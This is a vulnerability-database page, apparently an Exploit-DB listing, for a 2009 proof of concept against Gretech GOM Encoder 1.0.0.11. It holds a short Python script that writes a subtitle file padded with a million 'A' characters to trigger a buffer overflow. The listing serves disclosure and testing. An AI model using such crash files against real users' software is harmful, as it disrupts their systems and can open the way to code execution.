Lucene search

K
exploitdbEncrypt3d.M!ndEDB-ID:8225
HistoryMar 16, 2009 - 12:00 a.m.

Gretech GOM Encoder 1.0.0.11 - '.Subtitle' Buffer Overflow (PoC)

2009-03-1600:00:00
Encrypt3d.M!nd
www.exploit-db.com
25

AI Score

7.4

Confidence

Low

#exploit.py
#
# Gom Encoder (Subtitle File) Buffer Overflow PoC
# by :Encrypt3d.M!nd
#
#  Orignal Advisory:
#  https://www.securityfocus.com/bid/34120
#

chars = 'A' * 1000000

file = open ( 'devil_inside.srt', 'w' )
file.write ('1\n00:00:00,001 --> 00:00:06,000\n'+chars)
file.close()

# milw0rm.com [2009-03-16]

AI Score

7.4

Confidence

Low

Related for EDB-ID:8225